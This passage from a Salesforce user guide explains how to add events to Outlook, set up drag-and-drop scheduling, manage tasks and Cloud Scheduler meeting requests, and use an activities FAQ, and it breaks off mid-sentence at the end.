To create an Outlook appointment for your event, click Add to Outlook. The event immediately opens in Outlook. If it does
not open, save it to your computer as a .vcs file, open the file with Outlook, and then save the event. The Outlook appointment
is tagged with the “salesforce.com” category so that duplicates are not created during synchronization.

See Also:
Creating an Outlook Appointment for an Event
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Creating an Outlook Appointment for an Event
Available in: All Editions except Database.com

To add an event to Outlook:

1. Select an event from the Calendar on the Home tab or from the Open Activities or Activity History related list of a record.
2. Click Add to Outlook.
3. Click open to immediately add it to Outlook, or save it to your computer as a .vcs file. If you save it as a .vcs file, import

the file with Outlook.

The Outlook appointment is added to the “salesforce.com” folder.

Consider the following when adding an event to Outlook.

• When viewing the event added in Outlook, the description doesn't display line breaks that were entered in the event's
Description field. Any line breaks are replaced by two spaces in the .vcs file.

• You can also sync your Salesforce events to Outlook using Salesforce for Outlook.

See Also:
Using Connect for Outlook
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook

Working with Drag-and-Drop Scheduling
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To enable drag-and-drop scheduling:

“Edit Events”To create events:

Drag-and-drop scheduling enables you to create events associated with records by dragging records from list views on to weekly
calendar views and entering the details of the event in an overlay. This allows you to schedule events without leaving the list
view page. Drag-and-drop scheduling is available on list views for accounts, contacts, and leads.

After your administrator sets up drag-and-drop scheduling, you can click the Open Calendar link at the bottom of a list
view to display a weekly view of a calendar underneath the list. Then, you can drag a record from the list to a time slot on the
calendar to quickly create an event associated with the record. When the calendar is open, you can:

• Select the Change link to switch to any calendar to which you have access

• Click the Previous Week ( ) and Next Week ( ) icons to view the previous or next weeks in the calendar
• Click the Date Picker icon ( ) to choose a specific date on which to view the calendar
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• Select the This Week link to view the current week in the calendar

• Select the Show Weekends checkbox to display weekends on the calendar

• Click the Close icon ( ) to close the calendar at any time. Alternatively, you can click the Close Calendar link at the
bottom of the list view to close the calendar.

• Drag the bar in between the list view and calendar to resize the height of either one

Setting Up Drag-and-Drop Scheduling

Users with the “Customize Application” permission can set up drag-and-drop scheduling. To set up drag-and-drop scheduling:

1. From Setup, click Customize > Social Accounts and Contacts > User Interface.
2. Select the Enable Drag-and-Drop Scheduling on List Views checkbox.

To select the Enable Drag-and-Drop Scheduling on List Views checkbox, you must select the Enable
Drag-and-Drop Editing on Calendar Views and Enable Click-and-Create Events on Calendar
Views checkboxes.

3. Click Save.
4. Optionally, define event mini page layouts to include the fields you want users to update in the event edit overlay:

a. From Setup, click Customize > Activities > Event Page Layouts
b. Select Edit next to the event page layout name.
c. Click Mini Page Layout.
d. Select which fields to display in the event edit overlay.
e. Click Save.

Tips on Drag-and-Drop Scheduling

Consider the following for drag-and-drop scheduling:

• The Open Calendar link only appears at the bottom of list views for accounts, contacts, and leads.
• Drag-and-drop scheduling is not available for the Console tab, multi-person events, recurring events, accessibility mode,

or Connect Offline.
• List views that include drag-and-drop scheduling may take slightly longer than usual to display.
• We recommend adding the All Day Event field to the event mini page layout, as that field is not automatically added

to event mini page layouts. The All Day Event field allows users to specify whether an event lasts all day.
• Drag-and-drop scheduling includes enhanced lists; however, you do not need to enable enhanced lists for drag-and-drop

scheduling to work.
• When you drag the bar in between the list and calendar to resize either one, the size is automatically saved for all views in

which you use drag-and-drop scheduling. You can resize the list and calendar at any time.

See Also:
Using the Calendar Week View
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TRACKING YOUR WORK WITH TASKS

Viewing Tasks
Available in: All Editions except Database.com

Tasks allow you to track the specific actions you plan to perform or have performed, such as making phone calls or sending
mail. To view the details of a task, click the task's subject from any of the following locations:

• The My Tasks section of the Home tab

• The calendar day view

• An activities list view

• The Open Activities related list on an associated record

• The Activity History related list on an associated record

The recurrence icon ( ) identifies tasks that are part of a recurring series. To view the details of the individual task occurrence,
select the View Task subtab (located above the task details). To view the details of the entire task series, select the View Series
subtab .

If your organization has enabled Email-to-Case or On-Demand Email-to-Case, some tasks may be associated with
Email-to-Case or On-Demand Email-to-Case emails. Click the link at the top of the task to view the associated email. See
Working with Case Emails on page 1701 for more information.

If the task is an email that was sent to Salesforce using Email to Salesforce or Salesforce for Outlook, you may see a banner
at the top of the email detail page with a link to the My Unresolved Items page. Use this page to assign any unassociated
emails to related Salesforce records.

See Also:
Task Fields

Viewing and Editing Tasks in a Feed
In Chatter feeds, view tasks for types of records such as leads, accounts, and custom objects.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

• To view tasks related to a record, go to the detail page for a record, or click the Home or Chatter tab if you follow the
record.

• To edit a task in a feed, click the task subject. When the task detail page opens, click Edit.
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Your administrator can specify whether you can create tasks for different types of records, but for any record you follow, you
see feed items for tasks that anyone has created. For example, you may be able to view but not create tasks in the feeds for
accounts you have access to.

Note: On cases, feeds don’t include email tasks or call logging tasks.

See Also:
Creating a Task in a Feed

Creating Tasks
Available in: All Editions except Database.com

User Permissions Needed

“Edit Tasks”To create tasks:

Track the tasks you perform, such as making phone calls or sending email.

1. To create a task click New from the My Tasks section of the Home tab.
2. If you have an option to select a task record type, choose one from the drop-down list and click Continue.

Note:  When you create a task with a non-default record type and the task is part of a recurring series, Salesforce
still applies the default record type to your recurring task. Additionally, any picklist fields associated with the
default record type will not display.

3. Enter the task details.

• Assigned To. Assigned owner of task. By default, the task is assigned to the creator. To assign the task to another
user, enter a user’s name, or select a user with the lookup icon. This field is not available in Personal Edition. To assign
independent copies of a new task to multiple users, see Creating Group Tasks on page 1064.

• Subject. Subject or short description of the task, for example, “Email quote to customer.” You can enter a subject,
or select from a picklist of previously defined subjects.

• Due Date (optional). Date when the task should be completed. You can enter a date, or choose a date from the calendar
that displays when you put your cursor in the field.

• Comments (optional). Text note describing the task.
• Related To (optional). Record that the task is associated with such as an account or opportunity. This field is not

available when you associate the task with a lead instead of a contact.

• Name (optional). Contact or lead related to the task. You can enter the name of the person or use  to select the
name. If you use Shared Activities, you can relate up to 50 contacts to the task. To relate more than one name, click

. In the Select Contacts dialog box, type a name in the Search box, and click Find. Use  and  to select
and deselect names. Use the Make Primary button to select a primary contact. Then, click Done.
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4. If Spell Checker is enabled for your organization, click Check Spelling to spell-check the contents of the Comments field.
Spell Checker does not support all the languages that Salesforce supports. For example, Spell Checker doesn’t support
Thai, Russian, and double-byte languages, such as Japanese, Korean, or Chinese.

5. To attach files, click Attach File on the Attachments related list. If you don’t see this related list, you may need to first
ask your administrator to add it to the task page layout. For recurring tasks, the attachment is added to the series of tasks.
Each occurrence of the recurring task can also have its own unique set of attachments. Sending a notification email also
sends the attachment. Attachments to an activity display on the activity detail page but not on the related contact detail
page. This applies to Shared Activities and non-Shared Activities.

6. Specify the status and priority of the task.
7. Select the Send Notification Email checkbox to send a notification email to the task’s assignee when you save the

task. To save the current state of the checkbox as your personal default, select Make this the default setting.
8. For non-Shared Activities tasks, you can create a recurring task.

a. Select the Create Recurring Series of Tasks check box.

The Due Date field is disabled because not all recurring tasks have the same due dates.

b. Select the frequency of recurrence.

Note:  Depending on the type of series you are creating, the maximum number of occurrences is as follows:

• Daily: 100
• Weekly: 53
• Monthly: 60
• Yearly: 10

c. Set the start date and end date. Click Calculate max end date to automatically set the maximum end date allowed
based on the frequency you selected.

9. Optionally, set a reminder on the task.

If you’re creating a recurring task, the reminder applies to each occurrence in the task series.

10. Click Save, Save & New Task or Save & New Event.

If a new task is related to a record such as a lead, an account, or a custom object, the task appears in the feed for that record.

See Also:
Using Your Tasks and Calendar on the Home Page
Using the Open Activities Related List
Creating a Task in a Feed

Creating a Task in a Feed
We heard your feedback: Creating tasks right in the Chatter feed for a record is faster and easier, but it could be more flexible.
Now your administrator can improve support for your organization’s workflow by customizing how you create tasks and for
which types of records you can create them.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions
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User Permissions Needed

“Edit Tasks”To create tasks:

• Your administrator can specify the types of records on which you can create tasks. For example, you may be able to create
tasks in the feeds for accounts but not leads or opportunities. If you don’t see an option to create tasks in the feed on a
record detail page (in the publisher at the top of the feed), contact your administrator.

• Your administrator may customize the fields for creating tasks in your feed.

See Also:
Viewing and Editing Tasks in a Feed

Creating Group Tasks
Available in: All Editions except Database.com

User Permissions Needed

“Edit Tasks”To create tasks:

You can create a task so that up to 100 users are each assigned an independent copy of the task. For example, you could create
a task “Submit your expense reports” with the appropriate due date and assign it to a team of account executives.

This functionality is enabled by default, but your administrator can choose to disable it for your organization.

To create a group task:

1. On the New Task page, click the lookup icon ( ) next to the Assigned To field.
2. In the lookup window, select the Multiple Users tab.
3. Users can be organized into various categories such as personal groups, public groups, roles, or territories. In the Search

drop-down list, select the appropriate option.
4. Optionally, enter one or more characters in the text box and click Find to perform a search.
5. In the Available Members list, click one or more items to select them. Press CTRL+click to select multiple items

individually, or SHIFT+click to select multiple adjacent items at the same time.
6. Click the Add and Remove buttons to move your selections between the lists.
7. When the appropriate choices are in the Selected Members list, click Done. If your selections total more than 100

users, you must reduce your selections before you can proceed.
8. On the New Task page, see your selections display next to the Assigned To field. The total number of tasks you are

creating also displays.
9. Continue entering task details such as due date, status, and comments.

Note:  When a task is assigned to multiple users or a group, the Create Recurring Series of Tasks
checkbox is disabled. You cannot create group recurring tasks.
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10. When you save the task, your selected users will be assigned copies of the task. Note that these copies are independent and
not linked; they can be edited, transferred, or deleted individually.

Tip:  Personal groups are a convenient way to organize users into groups that are meaningful to you. For details, see
Creating and Editing Groups.

See Also:
Creating Tasks

Editing Tasks
Available in: All Editions except Database.com

User Permissions Needed

“Edit” on tasksTo edit tasks:

1. Click the subject of the task from the My Tasks section of the Home tab.
2. For non-recurring tasks, click Edit.
3. For non-Shared Activities tasks that are part of a recurring series, perform one of the following.

• To edit an individual task occurrence, click the View Task subtab, and click Edit Task.
• To edit an entire task series, click the View Series subtab and click Edit Series. Alternatively, on the event detail page,

in the Recurrence section, click the Edit Series link.

Note:

Changes made to a task series override changes made to single tasks due in the future. (Changes to a series don’t
affect tasks due before the current date.)

In addition, if you change either of the following settings in a series, links to tasks due in the future will break,
and triggers and workflows will be reset:

• Frequency
• Recurrence start or end date

4. Edit the task fields as needed.

Tip:

• Update the name of the contact or lead related to the task in Name or click  to open the Select Contacts

dialog box. If you use Shared Activities, use  and  in the Select Contacts dialog box to add or remove
names or use Search to find more names. You can relate up to 50 contacts to the task. Make sure to click Done
when you’re finished.
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• If Spell Checker is enabled for your organization, click Check Spelling to spell-check the contents of the
Comments field. Spell Checker does not support all the languages that Salesforce supports. For example, Spell
Checker doesn’t support Thai, Russian, and double-byte languages, such as Japanese, Korean, or Chinese.

• Select the Send Notification Email checkbox to send a notification email to the task’s assignee when
you save the task. To save the current state of the checkbox as your personal default, select Make this the
default setting.

• You can’t change the status of a task series. You can only change the status of individual tasks.

5. To attach files, click Attach File on the Attachments related list. If you don’t see this related list, you may need to first
ask your administrator to add it to the task page layout. For recurring tasks, the attachment is added to the series of tasks.
Each occurrence of the recurring task can also have its own unique set of attachments. Attachments to an activity display
on the activity detail page but not on the related contact detail page. This applies to Shared Activities and non-Shared
Activities.

6. Click Save.

See Also:
Viewing and Editing Tasks in a Feed
Shared Activities Overview

Closing Tasks
Available in: All Editions except Database.com

User Permissions Needed

“Edit Tasks”To edit tasks:

To close tasks:

1. On the My Tasks section of the Home tab or on the My Tasks section of the calendar day view, click X next to the
appropriate task. Alternatively, in the Open Activities related list on an associated record, click Cls next to the appropriate
task.

To close all tasks in a recurring series, you must close each occurrence separately.

2. Click Save to accept the changed Status value.
3. Click Save. The closed task displays in the Activity History related list of the associated record.

Note:  By default, the status changes to “Completed” when you click X or Cls. However, if your administrator has
customized the task status picklist, then the value changes to the first value for which the Closed checkbox is selected
according to the current order of picklist values. For example, if your administrator has customized the task status
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picklist values so that both “Completed” and “Deferred” are defined as Closed and “Deferred” is above “Completed”
in the current order of picklist values, then clicking X or Cls sets the status value to “Deferred.”

See Also:
Using the Activity History Related List

Deleting Recurring Tasks
Available in: All Editions except Database.com

User Permissions Needed

“Edit Tasks”To delete recurring tasks:

To delete a single task occurrence or an entire task series:

1. Click the subject of the task from any of the following locations:

• The My Tasks section of the Home tab
• The calendar day view
• An activities list view
• The Open Activities related list on an associated record
• The Activity History related list on an associated record

2. Do one of the following:

• To delete an individual task occurrence, select the View Task subtab located above the task details, and click Delete
Task.

• To delete a task series, select the View Series subtab, click Delete Series and click OK to confirm the deletion.

Deleted tasks are moved to the Recycle Bin.

Note:

When you delete a task series:

• Closed task occurrences are not deleted.

• Only future task occurrences are placed in the Recycle Bin.

• To restore a series from the Recycle Bin, you must restore each task occurrence. Salesforce restores series and
occurrence-specific task details.
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SCHEDULING MEETINGS

About Cloud Scheduler
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Edit Events”

AND

“Send Email”

To request a meeting:

Watch a Demo: Requesting a Meeting Using Cloud Scheduler (2:37 minutes)

Note: Cloud Scheduler isn't supported in Microsoft® Internet Explorer® version 6.0.

When you use Cloud Scheduler to request a meeting with a contact, lead, person account, or other Salesforce user, Salesforce
creates a unique Web page for your meeting that displays the proposed meeting times. When invitees visit the page, they select
the times that work for them, and send you a reply. Salesforce tracks all the responses so you can pick the best time to meet
when you confirm the meeting.

The following sections provide an overview of how to request a meeting using Cloud Scheduler.

Step 1: You Request a Meeting and Propose Meeting Times

Go to either the Calendar section on the Home tab or the Open Activities related list on the detail page of the contact,
lead, or person account you want to request a meeting with. Click New Meeting Request to open the Meeting Request
page.
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1. Click To to invite other Salesforce users, leads, contacts, or person accounts to the meeting.
2. Click in the calendar to propose up to five meeting times, or let Salesforce propose times for you.

Step 2: Invitees Pick the Times They Can Meet

Salesforce emails a meeting request to the invitees so they can pick the times they are available.

1. In the meeting request, invitees click Respond to This Request to open your meeting's Web page.
2. On the meeting Web page, invitees pick the proposed times that work for them and send you a reply.

Step 3: You Confirm the Meeting

Salesforce keeps track of all the responses so you can see when each invitee is available. You then select the best time to
meet and confirm the meeting.
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See Also:
Setting Up Cloud Scheduler
Shared Activities Overview

Requesting a Meeting Using Cloud Scheduler
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Edit Events”

AND

“Send Email”

To request a meeting:

Watch a Demo: Requesting a Meeting Using Cloud Scheduler (2:37 minutes)

Note: Cloud Scheduler isn't supported in Microsoft® Internet Explorer® version 6.0.

Before you use Cloud Scheduler to request a meeting with a contact, lead, person account, or other Salesforce user, consider
these tips:

• You must have at least read access to the contacts, leads, and person accounts that you request a meeting with.

• Each invitee must have an email address specified in their record so Salesforce can send them a meeting request.

• You can invite up to 50 people to a meeting. Invitees can consist of only contacts, leads, or person accounts, only other
Salesforce users, or a mix of both.

• We recommend you install Salesforce for Outlook so you can sync your calendar events between Salesforce and Microsoft®

Outlook®.
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When proposing meeting times, it's helpful to have your Salesforce calendar up-to-date so you can see your free and busy
times.

To request a meeting:

1. Go to either the Calendar section on the Home tab or the Open Activities related list on the detail page of the contact,
lead, or person account you want to invite to a meeting.

2. Click New Meeting Request.

If this button doesn't display in the Calendar on the Home tab or on the Open Activities related list, ask your Salesforce
administrator to add it.

3. Click To to invite other Salesforce users, leads, contacts, or person accounts to the meeting.

a. Select the type of invitee from the drop-down list. person accounts are returned in contact searches and can be added
as invitees.

b. Enter a name or part of a name in the text field, or leave the field blank to expand the search.
c. Click Go!.
d. In the Search Results area, select the boxes next to the people you want to invite and click Insert Selected. To add

more invitees, perform a new search and select more people as needed. If there's a warning icon ( ) next to a person's
name, you can't invite them to the meeting because they don't have an email address specified in their record. Once
you add an email address to their record, you can invite them to meetings.

e. Click Done.
f. To remove someone you just invited, click “x” next to their name in the To field. You can remove all invitees unless

you requested the meeting from an Open Activities related list. In that case, the first contact, lead or person account
in the To field can’t be removed.

4. Enter a subject and location.

If you requested the meeting from an Open Activities related list, the default subject is a combination of the account name
for the lead or contact and the company name specified in your personal information. For example, if you’re meeting with
a contact from the Sterling company and you work for ACME, the default subject is Sterling and ACME. The default
location is always To be determined.

5. Select one of these tabs:

• I propose meeting times—Propose up to five meeting times by picking times in the calendar. See Tips for Proposing
Meeting Times on page 1072.

• Let Salesforce propose meeting times—Choose the duration and time frame of the meeting and let Salesforce propose
up to five meeting times for you. See Tips for Letting Salesforce Propose Meeting Times on page 1073.

6. Click Next.
7. Write a message to the invitees, and click Send.

Note the following:

• Your email signature is automatically added to your message.
• After you click Send, Salesforce emails a meeting request to the invitees.

In the meeting request, invitees click Respond to This Request to open your meeting's Web page. On the meeting
Web page, invitees pick the proposed times that work for them and send you a reply.

• Your meeting’s Web page displays all messages between you and the invitees. This includes messages that invitees write
when responding to your request.
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• If you requested the meeting from an Open Activities related list, the meeting appears on the detail page for that contact
or lead only. It doesn’t appear on the Open Activities related list for any other invitee. For example, if you requested a
meeting with Jane Smith from her contact detail page and then clicked the To field to invite John Doe, the requested
meeting only appears on the Open Activities related list for Jane Smith and not John Doe. If you requested the meeting
from the Calendar section on the Home tab, the meeting doesn't appear on the Open Activities related list for either
Jane Smith or John Doe.

After you send your meeting request, wait for the invitees to reply with the times they can meet. Then confirm the meeting
by selecting a final meeting time.

See Also:
Canceling a Requested Meeting
Rescheduling a Requested Meeting

Tips for Proposing Meeting Times
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Edit Events”

AND

“Send Email”

To request a meeting:

Note: Cloud Scheduler isn't supported in Microsoft® Internet Explorer® version 6.0.

When you request a meeting using Cloud Scheduler, you can either propose meeting times or let Salesforce propose times for
you.

When you propose meeting times:

• Proposed times aren't saved to your Salesforce calendar. The meeting only appears in your calendar after you confirm the
meeting.

• When the invitees view your meeting request, the proposed times are shown in your time zone. Proposed times aren't
shown in the invitees' time zones.

• You can't propose a time that occurs in the past (before the black line in the calendar).

• The calendar's shaded areas show when you and the other invited Salesforce users are busy based on your Salesforce
calendars. Darker shades show when multiple Salesforce users are busy at the same time.

• Use the Duration field to change the length of your meeting.

• To remove a time you proposed, hover over the proposed time and click “x”.
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Tips for Letting Salesforce Propose Meeting Times
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Edit Events”

AND

“Send Email”

To request a meeting:

Note: Cloud Scheduler isn't supported in Microsoft® Internet Explorer® version 6.0.

When you request a meeting using Cloud Scheduler, you can either propose meeting times or let Salesforce propose times for
you.

One of the benefits of letting Salesforce propose meeting times happens when there's a long delay between the time you send
the meeting request and when the first invitee views it. For example, if you request a meeting with a contact on a Monday
and that contact doesn't view your request until Thursday, Salesforce proposes times from Thursday forward instead of when
the meeting request was sent.

When Salesforce proposes meeting times:

• You won't know which times are proposed until after you send the meeting request. Once the first invitee views your
request, Salesforce checks the calendars of all Salesforce users invited to the meeting and proposes meeting times based on
their availability.

Salesforce tries not to propose the same times that invitees have already selected for other unconfirmed meetings. For
example, if you request a meeting for the next five business days and your invitees respond that they can meet on Tuesday
and Wednesday from 2:00 to 3:00 p.m., and then you request another meeting for the same time frame, Salesforce won't
propose times for Tuesday and Wednesday from 2:00 to 3:00 p.m. unless your calendar is completely booked with confirmed
meetings and other events.

• By default, Salesforce proposes meeting times between 9:00 a.m. and 5:00 p.m. in your time zone. However, if you have
changed the Start of day and End of day fields in your Personal Information Settings page, Salesforce uses those
settings instead.

Note:  If you don't want to meet at a specific time of day (like your lunch hour), schedule a recurring event in your
Salesforce calender to block out that time.

The following table describes the settings that control how Salesforce proposes meeting times.

DescriptionField

The length of your meeting.Duration
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DescriptionField

How far in advance Salesforce proposes meeting times:Time Frame

• Next 5 Business Days/Next 10 Business Days—Salesforce
tries to spread out the proposed times over the specified
time frame. For example, if your time frame is Next 5
Business Days and the first invitee views the request on a
Monday, Salesforce tries to propose a time for each day of
that week. If some of your days are booked, Salesforce
condenses the proposed times into fewer days.

Business days exclude Saturdays and Sundays.

• Whenever—Salesforce tries to propose five meeting times
over the next five business days, and if it can't propose
enough times, it extends the range over the next 10
business days. If Salesforce still can't find five times to
propose, it looks for available times over the next four
weeks.

When you select this option, some of the times Salesforce
proposes could be seven weeks away (5 business days + 10
business days + 20 business days = 7 weeks).

See Also:
About Cloud Scheduler
Tips for Proposing Meeting Times

Confirming a Requested Meeting
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Edit Events”

AND

“Send Email”

To confirm a meeting:

Note: Cloud Scheduler isn't supported in Microsoft® Internet Explorer® version 6.0.
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After you use Cloud Scheduler to request a meeting, wait for the invitees to reply with the times they can meet. When this
happens, you receive an email notification, and the meeting in Salesforce is automatically updated with the times the invitees
selected. You can then choose the best time to meet and confirm the meeting.

The meeting confirmation page displays as read-only to users without the “Edit Events” permission and users without the
“Edit” permission on the contact or lead record associated with a proposed meeting.

To confirm a meeting:

1. Open your meeting using one of these methods:

• From the Calendar section on the Home tab, click the Requested Meetings subtab and then click the subject of your
meeting. If the Requested Meetings subtab doesn't display on the Calendar section, ask your administrator to add it.

• If you requested the meeting from the Open Activities related list for that contact, lead, or person account, click the
subject of your meeting in the related list.

• From the email notification that you received when an invitee responded to your meeting request, click View Response
and Schedule Meeting.

2. Select a time, and click Confirm.

The Confirm button displays after you select a meeting time. If you don't select a time, the Send Update button displays
instead so you can send the invitees a message without confirming a meeting time.

Use the following tools to help you pick a time:

• Green check marks show when each invitee can meet.
• Free shows when you are available based on your Salesforce calendar.
• If none of the times work for the invitees, reschedule the meeting to propose new times.

3. Optionally, enter a message to the invitee.
4. Click Send to confirm the meeting.

Salesforce then:

• Emails the invitees with the final date and time of the meeting.
• Converts the requested meeting to a new multi-person event. The last message you sent to the invitees appears in the

event's Description field, but all other messages between you and the invitees aren't saved.

This event appears in the Calendar section on the Home tab. If you requested the meeting from an Open Activities
related list, the event also appears in the Open Activities related list for that contact, lead, or person account.

Note:  If your administrator added required fields to events, you're prompted to update those fields before the meeting
is converted to an event.

See Also:
Canceling a Requested Meeting
About Cloud Scheduler
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Canceling a Requested Meeting
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Edit Events”

AND

“Send Email”

To cancel a meeting:

Note: Cloud Scheduler isn't supported in Microsoft® Internet Explorer® version 6.0.

If you requested a meeting that hasn't been confirmed, you can cancel the meeting and Salesforce automatically sends a
cancellation notice to the invitees. However, if you confirmed the meeting then it has been converted to an event that you can
delete like all other activities.

To cancel a requested meeting:

1. Open your meeting using one of these methods:

• From the Calendar section on the Home tab, click the Requested Meetings subtab and then click the subject of your
meeting. If the Requested Meetings subtab doesn't display on the Calendar section, ask your administrator to add it.

• If you requested the meeting from the Open Activities related list for that contact, lead, or person account, click the
subject of your meeting in the related list.

• From the email notification that you received when an invitee responded to your meeting request, click View Response
and Schedule Meeting.

2. Click Cancel Meeting.

You can also click Del next to the meeting from the Open Activities related list.

Note:  If Close is the only button on the page, you don't have permission to modify the requested meeting. Either
ask the organizer to change the meeting details for you, or contact your Salesforce administrator to grant you the
required permissions.

3. Click OK to confirm the cancellation.

Salesforce emails a meeting cancellation to all invitees. Canceled meetings are permanently removed and aren't stored in
the Recycle Bin.

See Also:
Deleting Activities
About Cloud Scheduler

1076

Canceling a Requested MeetingManaging Activities, Opportunities, and Products



Rescheduling a Requested Meeting
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Edit Events”

AND

“Send Email”

To reschedule a meeting:

Note: Cloud Scheduler isn't supported in Microsoft® Internet Explorer® version 6.0.

If you used Cloud Scheduler to request a meeting that hasn't been confirmed, you can reschedule it and propose new times.
However, you can't propose new times for a confirmed meeting because it's been converted to an event. To reschedule an
event, edit the event to change its date and send an update to the invitees.

To reschedule a requested meeting:

1. Open your meeting using one of these methods:

• From the Calendar section on the Home tab, click the Requested Meetings subtab and then click the subject of your
meeting. If the Requested Meetings subtab doesn't display on the Calendar section, ask your administrator to add it.

• If you requested the meeting from the Open Activities related list for that contact, lead, or person account, click the
subject of your meeting in the related list.

• From the email notification that you received when an invitee responded to your meeting request, click View Response
and Schedule Meeting.

2. Click Reschedule and propose new times.

Once the invitees reply to your updated request, you can confirm the meeting.

Note:  If Close is the only button on the page, you don't have permission to modify the requested meeting. Either
ask the organizer to change the meeting details for you, or contact your Salesforce administrator to grant you the
required permissions.

See Also:
About Cloud Scheduler
Tips for Proposing Meeting Times
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Adding and Removing Invitees from a Requested Meeting
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Edit Events”

AND

“Send Email”

To add and remove invitees from a requested meeting:

Note: Cloud Scheduler isn't supported in Microsoft® Internet Explorer® version 6.0.

If you requested a meeting that hasn't been confirmed, you can add and remove invitees at any time. Confirmed meetings are
converted to multi-person events. You can edit multi-person events to add and remove invitees.

To add or remove invitees from a requested meeting:

1. Open your meeting using one of these methods:

• From the Calendar section on the Home tab, click the Requested Meetings subtab and then click the subject of your
meeting. If the Requested Meetings subtab doesn't display on the Calendar section, ask your administrator to add it.

• If you requested the meeting from the Open Activities related list for that contact, lead, or person account, click the
subject of your meeting in the related list.

• From the email notification that you received when an invitee responded to your meeting request, click View Response
and Schedule Meeting.

2. Do either of the following:

• Click To to invite other Salesforce users, leads, contacts, or person accounts to the meeting.
• Click “x” next to an invitee's name to remove them from the meeting.

You can remove all invitees unless you requested the meeting from an Open Activities related list. In that case, the first
contact, lead or person account in the To field can’t be removed.

The calendar automatically updates based on the Salesforce users you added or removed from the meeting.

Note:  If Close is the only button on the page, you don't have permission to modify the requested meeting. Either
ask the organizer to change the meeting details for you, or contact your Salesforce administrator to grant you the
required permissions.

3. Click Send Update.
4. Enter a message. For example, you might want to inform your invitees who you're adding or removing from the meeting.
5. Click one of the following:

• Send to All Invitees—Sends an update to all existing and added invitees and a cancellation notice to removed invitees.
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• Send Only to Changed Invitees—Sends an update to added invitees and a cancellation notice to removed invitees.

See Also:
Requesting a Meeting Using Cloud Scheduler
About Cloud Scheduler

TRACKING TASKS, EVENTS, AND MEETINGS FAQS

Activities FAQ
Available in: All Editions except for Database.com

• How many contacts can I relate to activities?

• How can I choose a time for an event when inviting users from different time zones?

• How can I view other users’ activities?

• How can I contact a group of customers via email?

• How can I add my Outlook emails directly into Salesforce?

• How can I view activities that are more than a year old?

• How can I create a series of recurring events?

• How can I view a calendar that includes other user’s activities?

• What happens when I want to discontinue my service?

How many contacts can I relate to activities?
If your organization has enabled Shared Activities, you can relate as many as 50 contacts to non-recurring and non-group
tasks, and non-recurring events. You assign one primary contact; all others are secondary contacts.

If you organization hasn’t enabled Shared Activities, you can relate one contact to an activity.

See Also:
Activities FAQ
Shared Activities Overview
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How can I choose a time for an event when inviting users
from different time zones?

When you check the availability of invited users for an event, the display of available and busy times for all users has automatically
been converted from their time zones to your time zone, for your convenience. Simply choose an available time, and the system
sends an email to all invitees containing a link to the event. In the email and when the user views the event in his own browser,
the time and date are converted to the user’s personal time zone. Remember that a user’s Time Zone setting (as specified on
the personal information page) always overrides the organization’s Default Time Zone.

See Also:
Activities FAQ

How can I view other users’ activities?
You have access to view and edit your activities plus activities assigned to users below you in the role hierarchy. In addition,
when the activity sharing model is “Controlled By Parent,” users with the “View All” object-level permission for the given
object on the associated record can view the activity. Administrators, and users with the “View All Data” permission, can view
all activities.

In all Editions except Personal Edition, you can view the calendars of other users. You can see various levels of detail, add
events, or modify existing events, depending on your organization-wide calendar sharing defaults and how the user has set up
individual calendar sharing permissions. In day, week, or month view, click Change next to the name at the top of the calendar,
then select the user calendar you would like to see.

In Professional, Enterprise, Unlimited, and Developer Edition organizations, you can view group activities by using public
calendars. A public calendar contains a schedule of events that is available to a group of users; for example, a sales events
calendar for a sales department. If your organization has set up public calendars and you are assigned to those groups, you can
view public calendars in the same way you would switch to viewing another user’s calendar.

To create a list view of activities, choose the list view icon below the calendar on the home page. To view a report of activities,
choose the Tasks and Appointments link on the Reports tab. You can also create custom reports for activities related to
another record type, for example, a custom report about activities and opportunities. Click Create New Custom Report on
the Reports tab and select the Activities report type.

See Also:
Activities FAQ

How can I contact a group of customers via email?
In Professional, Enterprise, Unlimited, and Developer Edition organizations, you can use mass email to send an email message
to multiple leads, contacts, person accounts, or users.

This feature is useful for sending customized emails to groups of your customers. Note, however, that according to the Salesforce
Terms of Use, you cannot send unsolicited advertising or promotional materials.

To send mass email, choose the Mass Email link from the Tools section of the contacts, leads, or cases home page. You have
the option to log an activity for each email you send.
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Note:  Attachments in mass emails are sent as links rather than physical files. When recipients click the attachment
link in the email, the attachment opens in a separate Web browser from which they can download the file. Mass
email attachments are stored for 30 days.

See Also:
Activities FAQ

How can I add my Outlook emails directly into Salesforce?
You can use Salesforce for Outlook or Connect for Outlook to integrate your Microsoft® Outlook® emails with Salesforce.
These Outlook integration applications add new buttons and options to your Outlook user interface. These new buttons let
you log an outbound or sent email as a task in Salesforce. Then you can associate this task with a contact, lead, or other related
record.

See Also:
Activities FAQ

How can I view activities that are more than a year old?
Salesforce archives older activities according to the conditions below. These activities can be viewed only in the Printable
View of the associated record, the Activity History related list of the associated record, export files, or by clicking View All
on the Activity History related list. You can search for archived activities using advanced search. Administrators can also delete
archived activities using Mass Delete.

• Events with a due date greater than 365 days old
• Closed tasks with a due date greater than 365 days old
• Closed tasks without a due date that were created more than 365 days ago

See Also:
Activities FAQ

How can I create a series of recurring events?
To create a series of recurring events:

1. Create a new event.
2. On the event, select Create recurring series of Events and define the pattern of recurring events.

See Also:
Activities FAQ
Creating Recurring Events
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How can I view a calendar that includes other user’s
activities?

To view a calendar that includes other user's activities:

1. Click the multi-user view icon from any day, week, or month view of the calendar.
2. Click Create New View and build a list view that includes all the users whose events you want to see.

See Also:
Activities FAQ

What happens when I want to discontinue my service?
If the service does not meet your needs, it is possible to discontinue it. Users who are up-to-date with their payments may
request a complete download of the data that exists in the system. Click Help & Training at the top of any page and select
